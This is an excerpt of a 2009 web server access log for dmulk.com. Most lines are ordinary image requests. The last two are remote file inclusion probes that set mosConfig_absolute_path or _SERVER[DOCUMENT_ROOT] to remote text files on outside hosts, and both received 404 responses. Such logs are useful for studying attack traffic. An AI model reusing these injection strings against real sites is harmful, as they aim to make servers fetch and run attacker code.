63.206.47.131 - - [20/Nov/2009:12:14:57 -0800] "GET /blog/wp-content/gallery/westoc-2008/picture-122.jpg HTTP/1.1" 200 312231 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:15:10 -0800] "GET /blog/wp-content/gallery/2009-08-29-westoc2/Picture178-1024.jpg HTTP/1.1" 200 100060 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:15:23 -0800] "GET /blog/wp-content/gallery/westoc-2008/picture-011_4.jpg HTTP/1.1" 200 345886 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:15:48 -0800] "GET /blog/wp-content/gallery/2009-08-29-westoc/Picture202-1024.jpg HTTP/1.1" 200 53371 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
139.13.44.13 - - [20/Nov/2009:12:15:52 -0800] "GET /logs/access_080617.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mail.optima-corp.com/data/.../com_sef/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [20/Nov/2009:12:15:56 -0800] "GET /logs/access_090628.log////?_SERVER[DOCUMENT_ROOT]=http://come.kr/bbs/data/data2/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5